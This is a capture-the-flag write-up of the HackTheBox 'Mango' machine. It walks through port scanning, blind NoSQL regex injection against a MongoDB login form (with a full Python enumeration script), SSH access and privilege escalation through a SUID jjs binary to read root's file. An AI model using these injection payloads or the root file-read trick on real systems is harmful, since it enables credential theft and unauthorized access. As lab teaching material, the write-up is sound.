
[HTB] – Mango

Today's writeup is on Mango, a medium-difficulty Linux box released on October 26th 2019 on HackTheBox.

If you have VIP access on the website, you can access it here: https://www.hackthebox.eu/home/machines/profile/214

Recon

Using nmap, we look for open ports.

nmap -A -p- -T4 10.10.10.162

We are using basic nmap arguments here:

  • -A : enables OS detection (-O), version scanning (-sV), script scanning (-sC) and traceroute (--traceroute)
  • -p- : scans all 65535 TCP ports instead of nmap's default top 1000
  • -T4 : adjusts the timing template (according to your bandwidth and the speed you're seeking); even so, the full-range scan took almost 15 minutes here

The results are as follows:

┌─|Log_s [18:31] :~                                                                                  
└──╼ $ nmap -A -p- -T4 10.10.10.162                                                             
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-03 18:31 CEST
Nmap scan report for 10.10.10.162
Host is up (0.10s latency).
Not shown: 65351 closed ports, 181 filtered ports
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 a8:8f:d9:6f:a6:e4:ee:56:e3:ef:54:54:6d:56:0c:f5 (RSA)
|   256 6a:1c:ba:89:1e:b0:57:2f:fe:63:e1:61:72:89:b4:cf (ECDSA)
|_  256 90:70:fb:6f:38:ae:dc:3b:0b:31:68:64:b0:4e:7d:c9 (ED25519)
80/tcp  open  http     Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: 403 Forbidden
443/tcp open  ssl/http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Mango | Search Base
| ssl-cert: Subject: commonName=staging-order.mango.htb/organizationName=Mango Prv Ltd./stateOrProvinceName=None/countryName=IN
| Not valid before: 2019-09-27T14:21:19
|_Not valid after:  2020-09-26T14:21:19
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 885.64 seconds

Nothing out of the ordinary: SSH and HTTP(S) on their usual ports. Two details are worth noting, though. Port 80 answers 403 Forbidden while port 443 serves a real page, and the TLS certificate's common name is staging-order.mango.htb, which hints at name-based virtual hosting and gives us a hostname to try.

The next step of recon is to take a look at it in a web browser.

[Screenshot: port 80 access attempt]

On port 80, we get a Forbidden error. According to our scan, the next one to try is port 443, by typing the following URL in the address bar:

https://10.10.10.162/

Now things get interesting. We know we are in a safe lab environment, but let's check the certificate anyway: certificates frequently leak hostnames.

The certificate's common name gives us a hostname: staging-order.mango.htb. Let's add it, along with the parent domain, to our /etc/hosts file (the file is root-owned, so a plain >> redirection from a user shell is refused; tee with sudo performs the write as root):

echo "10.10.10.162 mango.htb staging-order.mango.htb" | sudo tee -a /etc/hosts

Now let's see what is going on by navigating to http://staging-order.mango.htb/. Apache serves this name as a separate virtual host, which is why the same port only returned 403 Forbidden when we addressed it by IP.

We get a nice login form. That's about it for the recon on this box.

Own User

For the first part, the box's name and the picture on the login form are big hints. There is a high probability that the database holding the credentials is MongoDB, and a MongoDB-backed login form is a prime candidate for NoSQL injection.

After some research we find a NoSQL injection script for MongoDB that enumerates usernames and passwords: https://github.com/an0nlk/Nosql-MongoDB-injection-username-password-enumeration

It relies on the login form passing the POST parameters unchanged into the MongoDB query: PHP turns a parameter such as username[$regex]=^a into an array, which the application hands to the database as the $regex operator, so the login succeeds or fails depending on whether some document matches the pattern. The script extends the prefix one character at a time until it has recovered every value.

We try the example command given in the README file, and it works. -up and -pp name the form's username and password parameters, -ep selects which of the two fields to enumerate, and -op adds the other POST fields the form expects.

─|Log_s [19:25] :~
└──╼ $ python nosqli-user-pass-enum.py -u http://staging-order.mango.htb -up username -pp password -ep username -op login:login,submit:submit
Warning: No method given. Using POST as the method. (You can give the method with -m)
Pattern found that starts with 'a'
Pattern found: ad
Pattern found: adm
Pattern found: admi
Pattern found: admin                                                                                                                            
username found: admin                                                                                                                                                                                                                                                
Pattern found that starts with 'm'                                                                                                              
Pattern found: ma                                                                                                                               
Pattern found: man                                                                                                                              
Pattern found: mang                                                                                                                             
Pattern found: mango                                                                                                                            
username found: mango

We do the same for the passwords by changing -ep to password:

─|Log_s [19:25] :~
└──╼ $python nosqli-user-pass-enum.py -u http://staging-order.mango.htb -up username -pp password -ep password -op login:login,submit:submit
Warning: No method given. Using POST as the method. (You can give the method with -m)                                                                                                                   
Pattern found that starts with 'h'                                                                                                              
Pattern found: h3                                                                                                                               
Pattern found: h3m                                                                                                                              
Pattern found: h3mX                                                                                                                             
Pattern found: h3mXK                                                                                                                            
Pattern found: h3mXK8                                                                                                                           
Pattern found: h3mXK8R                                                                                                                          
Pattern found: h3mXK8Rh                                                                                                                         
Pattern found: h3mXK8RhU                                                                                                                        
Pattern found: h3mXK8RhU~                                                                                                                       
Pattern found: h3mXK8RhU~f                                                                                                                      
Pattern found: h3mXK8RhU~f{                                                                                                                     
Pattern found: h3mXK8RhU~f{]                                                                                                                    
Pattern found: h3mXK8RhU~f{]f                                                                                                                   
Pattern found: h3mXK8RhU~f{]f5                                                                                                                  
Pattern found: h3mXK8RhU~f{]f5H                                                                                                                 
password found: h3mXK8RhU~f{]f5H                                                                                                                                                                                                                                     
Pattern found that starts with 't'                                                                                                              
Pattern found: t9                                                                                                                               
Pattern found: t9K                                                                                                                              
Pattern found: t9Kc                                                                                                                             
Pattern found: t9KcS                                                                                                                            
Pattern found: t9KcS3                                                                                                                           
Pattern found: t9KcS3>                                                                                                                          
Pattern found: t9KcS3>!                                                                                                                         
Pattern found: t9KcS3>!0                                                                                                                        
Pattern found: t9KcS3>!0B                                                                                                                       
Pattern found: t9KcS3>!0B#                                                                                                                      
Pattern found: t9KcS3>!0B#2                                                                                                                     
password found: t9KcS3>!0B#2

We now have two usernames, admin and mango, and two passwords, h3mXK8RhU~f{]f5H and t9KcS3>!0B#2. The script does not tell us which password belongs to which user, so we simply try the combinations.
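The blind enumeration the script performs above, as an added example that is not part of the original post and not the linked tool's code. The "server" is a constructed in-process mock of a vulnerable PHP handler that passes the POST fields straight into the MongoDB query, so the script runs offline; the user collection (alice/bob and their passwords) is constructed sample data chosen so the passwords contain regex metacharacters, and the send callable is the only part to swap for a real HTTP POST.

```python
"""
Blind NoSQL-injection enumeration against a MongoDB-backed login form.

Added example, not the page's or the linked tool's code. `mock_login`
stands in for the vulnerable handler so everything runs offline.
"""
import re
import string
from urllib.parse import parse_qs, urlencode

# Constructed sample collection; the passwords deliberately contain regex
# metacharacters ({ } ^) so the escaping in enumerate_field is exercised.
USERS = [
    {"username": "alice", "password": "P@ss{w0rd}"},
    {"username": "bob", "password": "hunter2^"},
]

# Characters tried at each position; extend it if the target allows more.
CHARSET = string.ascii_letters + string.digits + string.punctuation + " "


def php_parse_post(body):
    """Mimic PHP's $_POST: 'username[$regex]=^a' becomes {'username': {'$regex': '^a'}}."""
    post = {}
    for key, values in parse_qs(body, keep_blank_values=True).items():
        m = re.fullmatch(r"(\w+)\[([^\]]*)\]", key)
        if m:
            post.setdefault(m.group(1), {})[m.group(2)] = values[0]
        else:
            post[key] = values[0]
    return post


def mongo_match(value, cond):
    """Minimal MongoDB predicate: plain equality, or a dict of $regex / $ne operators."""
    if not isinstance(cond, dict):
        return value == cond
    for op, arg in cond.items():
        if op == "$regex":
            if re.search(arg, value) is None:
                return False
        elif op == "$ne":
            if value == arg:
                return False
        else:
            raise ValueError("unsupported operator " + op)
    return True


def mock_login(body):
    """Vulnerable handler: findOne({username: $_POST['username'], password: $_POST['password']})."""
    post = php_parse_post(body)
    query = {"username": post.get("username", ""), "password": post.get("password", "")}
    return any(all(mongo_match(user[f], c) for f, c in query.items()) for user in USERS)


def probe(send, field, pattern, other):
    """One oracle query: does any document have `field` matching `pattern`?
    `other[$ne]=x` keeps the rest of the query true without knowing its value."""
    body = urlencode({field + "[$regex]": pattern, other + "[$ne]": "x", "login": "login"})
    return send(body)


def enumerate_field(send, field, other, charset=CHARSET):
    """Recover every distinct value of `field` by extending prefixes one char at a time.

    re.escape keeps characters such as { ] ^ in a password from being read as
    regex syntax. A value that is a prefix of another (admin, admin2) is still
    found, because each prefix is tested for completeness (^prefix$) and also
    extended further.
    """
    found, frontier = [], [""]
    while frontier:
        prefix = frontier.pop()
        if prefix and probe(send, field, "^" + re.escape(prefix) + "$", other):
            found.append(prefix)
        for ch in charset:
            candidate = prefix + ch
            if probe(send, field, "^" + re.escape(candidate), other):
                frontier.append(candidate)
    return sorted(found)


if __name__ == "__main__":
    # Against a real target, send would be something like (assumed shape):
    #   lambda body: is_success(requests.post(URL, data=body, allow_redirects=False,
    #                           headers={"Content-Type": "application/x-www-form-urlencoded"}))
    # where is_success checks the form's own success indicator (redirect, page text).
    print("usernames:", enumerate_field(mock_login, "username", "password"))
    print("passwords:", enumerate_field(mock_login, "password", "username"))
```

Each recovered character costs one request per charset entry, so a 16-character password like the one above needs well over a thousand requests; against a real box that is noisy, which is exactly why a login endpoint should never echo back a boolean that depends on a partial match.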

Now we try to SSH in with those credentials. We cannot connect as admin, but mango works!

─|Log_s [19:25] :~
└──╼ $ ssh mango@10.10.10.162
mango@10.10.10.162's password: 
Welcome to Ubuntu 18.04.2 LTS (GNU/Linux 4.15.0-64-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Fri Apr 17 14:36:00 UTC 2020

  System load:  0.21               Processes:            116
  Usage of /:   26.0% of 19.56GB   Users logged in:      1
  Memory usage: 12%                IP address for ens33: 10.10.10.162
  Swap usage:   4%


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

122 packages can be updated.
18 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Fri Apr 17 14:21:31 2020 from 10.10.14.205
mango@mango:~$ 

The user.txt file, however, is located in /home/admin. That's not a problem, since we hold the other password too; we switch user with su:

mango@mango:~$ su admin
Password :
$ whoami
admin
$

Now a simple

cat /home/admin/user.txt

and the flag appears.

Privesc (Own Root)

For the second part, we start with the well-known enumeration script LinEnum.sh and find an interesting binary with the SUID bit set that we can exploit.

[+] Possibly interesting SUID files:
-rwsr-sr-- 1 root admin 10352 Jul 18 18:21 /usr/lib/jvm/java-11-openjdk-amd64/bin/jjs

After looking up jjs, it turns out to be the command-line front end of Nashorn, the JavaScript engine bundled with the JDK. In other words, it lets us run JavaScript, with access to the Java standard library, from our terminal. The interesting part is the mode -rwsr-sr--: the binary is setuid root and setgid admin, and only its owner and the admin group may execute it. That is why becoming admin mattered, and it means anything we run through jjs executes with root privileges.
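To make the LinEnum finding concrete, here is an added example (mine, not LinEnum's or the page's code) that decodes an ls -l mode string such as the one above, reports which uid/gid the binary runs as and who may invoke it, and walks a directory tree for set-id files the way LinEnum's SUID check does. The ls -l line it parses is the page's own finding; any directory you point the scanner at is your choice.

```python
"""
Added example (not LinEnum's code): decode SUID/SGID findings and scan for them.
"""
import os
import stat


def parse_mode(mode_str):
    """Decode a 10-character `ls -l` mode string such as '-rwsr-sr--'."""
    if len(mode_str) != 10:
        raise ValueError("expected a 10-character mode string, got %r" % mode_str)
    owner, group, other = mode_str[1:4], mode_str[4:7], mode_str[7:10]
    return {
        "setuid": owner[2] in "sS",      # 's' = setuid + exec, 'S' = setuid without exec
        "setgid": group[2] in "sS",
        "owner_exec": owner[2] in "xs",
        "group_exec": group[2] in "xs",
        "other_exec": other[2] in "xt",  # 't' = sticky + exec (unusual on a file)
    }


def describe_setid_binary(ls_line):
    """Summarise one `ls -l` line: as which user/group the file runs, and who may invoke it."""
    fields = ls_line.split()
    mode, owner, group, path = fields[0], fields[2], fields[3], fields[-1]
    bits = parse_mode(mode)
    invocable_by = []
    if bits["owner_exec"]:
        invocable_by.append("user " + owner)
    if bits["group_exec"]:
        invocable_by.append("group " + group)
    if bits["other_exec"]:
        invocable_by.append("everyone")
    return {
        "path": path,
        "runs_as_user": owner if bits["setuid"] else "caller",
        "runs_as_group": group if bits["setgid"] else "caller",
        "invocable_by": invocable_by,
    }


def find_setid_files(root):
    """Walk `root` and return (path, setuid, setgid) for regular files with either bit set.

    Equivalent to `find root -type f \\( -perm -4000 -o -perm -2000 \\)`, but it
    skips unreadable entries instead of aborting, as an unprivileged scan must.
    """
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: do not follow symlinks
            except OSError:
                continue
            if not stat.S_ISREG(st.st_mode):
                continue
            if st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                hits.append((path, bool(st.st_mode & stat.S_ISUID), bool(st.st_mode & stat.S_ISGID)))
    return sorted(hits)


if __name__ == "__main__":
    # The page's own LinEnum finding.
    print(describe_setid_binary(
        "-rwsr-sr-- 1 root admin 10352 Jul 18 18:21 /usr/lib/jvm/java-11-openjdk-amd64/bin/jjs"))
    for path, suid, sgid in find_setid_files("/usr/lib/jvm"):
        print(path, "setuid" if suid else "", "setgid" if sgid else "")
```

The output for the jjs line says it runs as root:admin and can be invoked only by root and the admin group, which is the whole reason the mango shell alone was not enough for this step.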

There are two ways of solving this. The first is to use the JavaScript prompt and Java's file classes to load the content of /root/root.txt into a buffer and print it character by character.

The other way (I suck at JS) is to run the binary with the file path as its argument to trigger a parse error: jjs cannot interpret the content of the file as JavaScript instructions, and the error message quotes the offending line, which is the flag itself.

$ /usr/lib/jvm/java-11-openjdk-amd64/bin/jjs /root/root.txt

And here is our root flag !

Thanks for reading, see you for another writeup 😉
